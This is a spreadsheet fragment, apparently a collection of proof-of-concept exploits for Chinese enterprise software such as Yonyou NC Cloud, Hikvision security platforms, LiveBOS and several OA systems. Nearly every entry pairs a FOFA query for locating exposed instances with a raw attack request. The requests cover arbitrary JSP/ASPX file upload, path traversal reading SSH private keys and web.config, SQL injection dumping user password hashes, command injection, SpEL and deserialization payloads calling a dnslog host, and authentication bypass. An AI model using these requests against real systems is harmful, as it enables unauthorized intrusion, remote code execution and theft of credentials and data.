        <u/>
        <sz val="10"/>
        <color rgb="FF175CEB"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>http://tempuri.org/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  &lt;/soap:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>eking管理易FileUpload接口存在任意文件上传漏洞</t>
  </si>
  <si>
    <t>app="EKing-管理易"</t>
  </si>
  <si>
    <t>POST /app/FileUpload.ihtm?comm_type=EKING&amp;file_name=../../rce.jsp. HTTP/1.1
Host: 
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6
--WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Disposition: form-data; name="uplo_file"; filename="rce.jpg"
&lt;% out.println("hello");%&gt;
--WebKitFormBoundaryHHaZAYecVOf5sfa6--</t>
  </si>
  <si>
    <t>用友NC Cloud queryPsnInfo SQL注入</t>
  </si>
  <si>
    <t>app="用友-NC-Cloud"</t>
  </si>
  <si>
    <t>GET /ncchr/pm/obj/queryPsnInfo?staffid=1%27+AND+1754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%281754%3D1754%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--+Nzkh HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close</t>
  </si>
  <si>
    <t>用友NC-Cloud系统queryStaffByName存在SQL注入漏洞</t>
  </si>
  <si>
    <t>GET /ncchr/pm/staff/queryStaffByName?name=1%27+AND+7216%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%287216%3D7216%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29--+hzDZ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close</t>
  </si>
  <si>
    <t>用友NC-Cloud blobRefClassSearch反序列化rce</t>
  </si>
  <si>
    <t>POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
Content-Type: application/json
Content-Length: 113
{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"p76bl0.dnslog.cn\"}}}"}</t>
  </si>
  <si>
    <t>启业云运维平台 未授权创建管理员用户漏洞</t>
  </si>
  <si>
    <t>GET/user/register/initHTTP/1.1 
Host: 
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36 
(KHTML,likeGecko)Chrome/122.0.0.0Safari/537.36 
Content-type:application/x-www-from-urlencoded 
Content-Length:34</t>
  </si>
  <si>
    <t>锐捷意图网络指挥官远程命令执行漏洞</t>
  </si>
  <si>
    <t>浙江大华技术股份有限公司DSS前台RCE</t>
  </si>
  <si>
    <t>JRES3.0 分布式服务开发平台uploadImage.json存在任意文件上传</t>
  </si>
  <si>
    <t>360天擎 - sql注入</t>
  </si>
  <si>
    <t>/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--</t>
  </si>
  <si>
    <t>360天擎 - 未授权访问</t>
  </si>
  <si>
    <t>/api/dp/rptsvcsyncpoint?ccid=1</t>
  </si>
  <si>
    <t>LiveBOSUploadImage.do接口任意文件上传</t>
  </si>
  <si>
    <t>POST /feed/UploadImage.do;.js.jsp HTTP/1.1 
Host: 
User-Agent: Mozilla/4.0(compatible; MSIE 9.0; Windows NT 6.1) 
Content-Length: 274 
Content-Type: multipart/form-data; 
boundary=----WebKitFormBoundaryxegqoxxi 
Accept-Encoding: gzip 
---WebKitFormBoundaryxegqoxxi 
Content-Disposition: 
form-data; 
name="file"; 
filename="../../../../../../././../../../../../java/fh/tomcat_fhxszsq/LiveBos/FormBuilder/ 
feed/jsp/vtnifpvi.js" 
Content-Type: image/jpeg 
GIF89a 123123123 
---WebKitFormBoundaryxegqoxxi--</t>
  </si>
  <si>
    <t>万户 ezOFFICE 协同管理平台 getAutoCode SQL 注入漏洞</t>
  </si>
  <si>
    <t>GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1 
&amp;head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898% 
29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2 
C5%29--+YJdO&amp;field=field_name&amp;tabName=tfield HTTP/1.1 
Host: 
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36</t>
  </si>
  <si>
    <t>致远OAthirdpartyController接口身份鉴别绕过漏洞</t>
  </si>
  <si>
    <t>OST/seeyon/thirdpartyController.do?method=accessHTTP/1.1 
Host: 
Cache-Control:max-age=0 
Upgrade-Insecure-Requests:1 
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36 
(KHTML,likeGecko)Chrome/109.0.0.0Safari/537.36 
Accept-Encoding:deflate 
Content-Type:application/x-www-form-urlencoded
method=access&amp;enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04 
%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4</t>
  </si>
  <si>
    <t>契约锁电子签章平台/param/edits远程代码执行漏洞</t>
  </si>
  <si>
    <t>app="契约锁-电子签署平台"</t>
  </si>
  <si>
    <t>POST/contract/ukeysign/.%2e/.%2e/template/param/editsHTTP/1.1 
Host: 
User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7) 
AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36 
Content-Type:application/json
{"id":"2","params":[{"expression":"vara=new 
org.springframework.expression.spel.standard.SpelExpressionParser();var 
b='SpEL表达式的base64编码';varb64=java.util.Base64.getDecoder();var
deStr=newjava.lang.String(b64.decode(b),'UTF-8');var 
c=a.parseExpression(deStr);c.getValue();"}]}</t>
  </si>
  <si>
    <t>ClusterControl存在任意文件读取漏洞</t>
  </si>
  <si>
    <t>GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
Host: 
Accept-Encoding: identity
User-Agent: python-urllib3/1.26.4</t>
  </si>
  <si>
    <t>迈普多业务融合网关send_order.cgi存在命令执行漏洞（老洞）</t>
  </si>
  <si>
    <t>POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64MHhzZWM=; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
{"opid":"1","name":";id;uname -a;","type":"rest"}</t>
  </si>
  <si>
    <t>赛蓝企业管理系统存在任意账号登录漏洞</t>
  </si>
  <si>
    <t xml:space="preserve">/AuthToken/Index?loginName=System&amp;token=c94ad0c0aee8b1f23b138484f014131f </t>
  </si>
  <si>
    <t>panabit日志审计系统sprog_upstatus存在SQL注入漏洞</t>
  </si>
  <si>
    <t>GET /Maintain/sprog_upstatus.php?status=1&amp;id=1%20and%20updatexml(1,concat(0x7e,user()),0)&amp;rdb=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Host: 47.93.242.67</t>
  </si>
  <si>
    <t>证书查询系统存在任意文件读取漏洞</t>
  </si>
  <si>
    <t>"/index/js/jquery.uls.data.js'"</t>
  </si>
  <si>
    <t>GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</t>
  </si>
  <si>
    <t>方天云智慧平台系统 Upload.ashx 任意文件上传</t>
  </si>
  <si>
    <t>POST /Upload.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
Connection: close
------WebKitFormBoundarySl8siBbmVicABvTX
Content-Disposition: form-data; name="file"; filename="qwe.aspx"
Content-Type: image/jpeg
&lt;%@Page Language="C#"%&gt;&lt;%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%&gt;
------WebKitFormBoundarySl8siBbmVicABvTX--</t>
  </si>
  <si>
    <t>方天云智慧平台系统 GetCustomerLinkman SQL注入</t>
  </si>
  <si>
    <t>POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/json
{clmID:"1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QurA"}</t>
  </si>
  <si>
    <t>易宝OA BasicService SQL注入</t>
  </si>
  <si>
    <t>app="顶讯科技-易宝OA系统"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /WebService/BasicService.asmx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10_13_6)</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Chrome/74.0.3729.169</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application/x-www-form-urlencoded</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http://tempuri.org/ExecuteSqlForNone</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Content-Length:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 85</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&lt;ExecuteSqlForNone</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&lt;sql&gt;waitfor</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> delay</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> '0:0:5'--+&lt;/sql&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &lt;strParameters&gt;&lt;/strParameters&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &lt;webservicePassword&gt;{ac80457b-368d-4062-b2dd-ae4d490e1c4b}&lt;/webservicePassword&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
    &lt;/ExecuteSqlForNone&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  &lt;/soap:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞</t>
  </si>
  <si>
    <t>浪潮财务管理系统 gspauditwebservice.asmx 存在反序列化漏洞</t>
  </si>
  <si>
    <t>信呼OA index存在SQL注入漏洞</t>
  </si>
  <si>
    <t>GET /index.php?m=openmodhetong|openapi&amp;d=task&amp;a=data&amp;ajaxbool=0&amp;nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</t>
  </si>
  <si>
    <t>广联达OA系统接口ConfigService.asmx存在SQL注入漏洞</t>
  </si>
  <si>
    <t>header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /Webservice/IM/Config/ConfigService.asmx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{{Hostname}}</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Chrome/123.0.6312.88</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&lt;GetIMDictionary</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&lt;key&gt;1'</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> UNION</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> ALL</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> SELECT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> top</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 1812</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> concat(F_CODE,':',F_PWD_MD5)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> from</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
T_ORG_USER</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> --&lt;/key&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/GetIMDictionary&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>广联达OA系统GetSSOStamp接口存在任意用户登录</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx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Accept:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> */*</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10_15_7)</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Chrome/126.0.0.0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350</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http://tempuri.org/GetStamp</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&lt;GetStamp</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&lt;usercode&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
admin&lt;/usercode&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/GetStamp&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>海康威视综合安防管理平台clusters接口存在任意文件上传漏洞</t>
  </si>
  <si>
    <t>app="HIKVISION-综合安防管理平台"</t>
  </si>
  <si>
    <t>POST /clusterMgr/clusters/ssl/file;.js HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/112.0.0.0 Safari/537.36 HTML
Accept: */*
Host: 8.8.8.8:1443
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------984514492333278399715408
Content-Length: 339
----------------------------984514492333278399715408
Content-Disposition: form-data; name="file"; filename="languages/default.jsp"
Content-Type: image/png
&lt;%=123%&gt;
----------------------------984514492333278399715408
Content-Disposition: form-data; name="proxyAddress"
8.8.8.8
----------------------------984514492333278399715408--
/clusterMgr/languages/default.jsp;.js</t>
  </si>
  <si>
    <t>3C环境自动监测监控系统ReadLog文件读取漏洞</t>
  </si>
  <si>
    <t>GET /ajax/sys/LogService.ashx?Method=ReadLog&amp;FileName=../web.config HTTP/1.1
Host: 
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close</t>
  </si>
  <si>
    <t>通天星CMSV6车载视频监控平台SESSION伪造漏洞</t>
  </si>
  <si>
    <t>POST /808gps/LocationManagement/UserSessionAction_saveUserSession.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:103.0)Gecko/20100101Firefox/103.0
Content-Type: application/x-www-form-urlencoded
userSession=42AA7A2BE767123A42E1530ACC920781&amp;amp;amp;id=4</t>
  </si>
  <si>
    <t>甄云 SRM 云平台 SpEL 表达式注入漏洞</t>
  </si>
  <si>
    <t>/oauth/public/SpEL表达式/ab?username=bHM=</t>
  </si>
  <si>
    <t xml:space="preserve">国泰新点oa协同系统前台 uploadFile 任意⽂件上传漏洞 </t>
  </si>
  <si>
    <t>致远服务 S1 存在敏感信息泄露漏洞</t>
  </si>
  <si>
    <t>蓝凌 OA 存在 sso 密钥泄露漏洞</t>
  </si>
  <si>
    <t>海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞</t>
  </si>
  <si>
    <t>POST /center_install/picUploadService/v1/uploadAllPackage/image HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: */*
Host: 192.168.52.228:8001
Accept-Encoding: gzip, deflate
Connection: close
Token: SElLIGlhL3NmaGNjaTY3WWxWK0Y6UzVCcjg1a2N1dENqVUNIOUM3SE1GamNkN2dnTE1BN1dGTDJldFE0UXFvbz0=
Content-Type: multipart/form-data; boundary=--------------------------553898708333958420021355
Content-Length: 233
----------------------------553898708333958420021355
Content-Disposition: form-data; name="sendfile"; filename="../../../../components/tomcat85linux64.1/webapps/eportal/y4.js"
Content-Type: application/octet-stream
expzhizhuo
----------------------------553898708333958420021355--</t>
  </si>
  <si>
    <t>易招标 前台存在任意文件上传漏洞</t>
  </si>
  <si>
    <t>灵动业务架构平台(LiveBOS)系统UploadImage.do接口文件上传漏洞(XVE-2024-18835)</t>
  </si>
  <si>
    <t>app="LiveBOS-框架"</t>
  </si>
  <si>
    <t>POST /feed/UploadImage.do;.css.jsp HTTP/1.1
Host:
Httpsendrequestex: true
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Postman-Token: 049266bd-e740-40bf-845f-bc511296894e
Accept-Encoding: gzip, deflate
Cookie: zhzbsessionname=35FF312409BF3CAC561D5BC776643A05
Content-Type: multipart/form-data;boundary=--------------------------WebKitFormBoundaryxegqoxxi
Content-Length: 222
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data;name="file";filename="../../../../../../././../../../../../java/fh/tomcat_fhxszsq/LiveBos/FormBuilder/
feed/jsp/vtnifpvi.js"
Content-Type: image/jpeg
GIF89a 123123123
---WebKitFormBoundaryxegqoxxi--</t>
  </si>
  <si>
    <t>章管家前台任意文件上传漏洞(XVE-2024-19042)</t>
  </si>
  <si>
    <t>app="章管家-印章智慧管理平台"</t>
  </si>
  <si>
    <t xml:space="preserve">、使用以下 PoC 新建用户
POST /api/personSeal_jdy/saveUser.htm HTTP/1.1
Host:
User-Agent:  Mozilla/5.0  (Windows  NT  10.0;  Win64;  x64)  AppleWebKit/537.36
(KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sid=ed467a70-91e9-450d-a2cPOST /seal/sealApply/uploadFileByChunks.htm?token=dingtalk_token&amp;person_id=40288053800311e80180261b92ab005e&amp;chunk=1&amp;chunks=1&amp;guid=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0)
Gecko/20100101 Firefox/128.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language:
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: sid=58139d92-115f-4e9b-99a1-ee200a8b17a0;
ZHANGIN_CHECKBOX=false; ZHANGIN_MOBILE=;JSESSIONID=30A3F3F324080E3B327FEB2EB82E2CB0
Content-Type: multipart/form-data; boundary=--------952870761
Content-Length: 140
----------952870761
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: image/jpeg
&lt;%@ page import= "java.io.File" %&gt;
&lt;%
out.println("111");
String filePath = application.getRealPath(request.getServletPath());
out.println(filePath);
new File(filePath).delete();
%&gt;
----------952870761--1-db1fab8123ad
Connection: close
Content-Type: application/json
Content-Length: 211
{"op":{},"data":{"mobile":"13333333333","uid":"13333333333","password":"12345
6","name":"testuser","return_url":"https://www.baidu.com","apisecretkey":"1","_id
":"1","mail_address":"111@qq.com"},"b7o4ntosbfp":"="}
2、通过刚才的用户登陆获取 Cookie ，使用以下 PoC 上传文件
</t>
  </si>
  <si>
    <t>灵动业务架构平台(LiveBOS)系统UploadFile.do接口文件上传漏洞(XVE-2023-21708)</t>
  </si>
  <si>
    <t>POST /feed/UploadFile.do;.css.jsp HTTP/1.1
Host:
Httpsendrequestex: true
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Postman-Token: 049266bd-e740-40bf-845f-bc511296894e
Accept-Encoding: gzip, deflate
Cookie: zhzbsessionname=35FF312409BF3CAC561D5BC776643A05
Content-Type: multipart/form-data;boundary=--------------------------688644671867822357584225
Content-Length: 222
----------------------------688644671867822357584225
Content-Disposition: form-data; name="NewFile"; filename="/../../../11.jsp"
Content-Type: text/plain
test
----------------------------688644671867822357584225—-</t>
  </si>
  <si>
    <t>赛蓝企业管理系统GetFieldJson存在SQL注入漏洞</t>
  </si>
  <si>
    <t>body="www.cailsoft.com" || body="赛蓝企业管理系统"</t>
  </si>
  <si>
    <t>http://ip/BaseModule/ExcelImport/GetFieldJson?tableCode=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%2881%29%2BCHAR%28119%29%2BCHAR%2888%29%2BCHAR%2899%29%2BCHAR%2865%29%2BCHAR%28108%29%2BCHAR%28115%29%2BCHAR%2881%29%2BCHAR%2886%29%2BCHAR%2884%29%2BCHAR%28109%29%2BCHAR%2866%29%2BCHAR%28114%29%2BCHAR%2881%29%2BCHAR%28105%29%2BCHAR%28116%29%2BCHAR%28115%29%2BCHAR%28121%29%2BCHAR%2885%29%2BCHAR%2878%29%2BCHAR%2867%29%2BCHAR%28103%29%2BCHAR%28118%29%2BCHAR%28103%29%2BCHAR%2887%29%2BCHAR%28119%29%2BCHAR%28115%29%2BCHAR%28109%29%2BCHAR%2866%29%2BCHAR%2869%29%2BCHAR%2867%29%2BCHAR%28104%29%2BCHAR%2889%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2878%29%2BCHAR%28100%29%2BCHAR%2874%29%2BCHAR%28119%29%2BCHAR%2874%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL--+cqNB</t>
  </si>
  <si>
    <t>同享人力系统hdlUploadFile接口存在任意文件上传</t>
  </si>
  <si>
    <t>body="/Assistant/Default.aspx"</t>
  </si>
  <si>
    <t>poc:
  relative: req0 &amp;&amp; req1
  session: false
  requests:
  - method: POST
    timeout: 10
    path: /MobileService/Web/Handler/hdlUploadFile.ashx?puser=../../../Style/abcd
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
        Gecko) Chrome/94.0.2558.72 Safari/537.36
    follow_redirects: true
    matches: code.eq("200")
    files:
      Filedata:
      - nihao.aspx
      - data:text/plain;base64,PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+CjwlClJlc3BvbnNlLldyaXRlKEZvcm1zQXV0aGVudGljYXRpb24uSGFzaFBhc3N3b3JkRm9yU3RvcmluZ0luQ29uZmlnRmlsZSgidGVzdDEyMyIsICJNRDUiKSk7ClN5c3RlbS5JTy5GaWxlLkRlbGV0ZShSZXF1ZXN0LlBoeXNpY2FsUGF0aCk7CiU+
      - text/plain
  - method: GET
    timeout: 10
    path: /Style/abcd.aspx
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
        Gecko) Chrome/94.0.2558.72 Safari/537.36
    follow_redirects: true
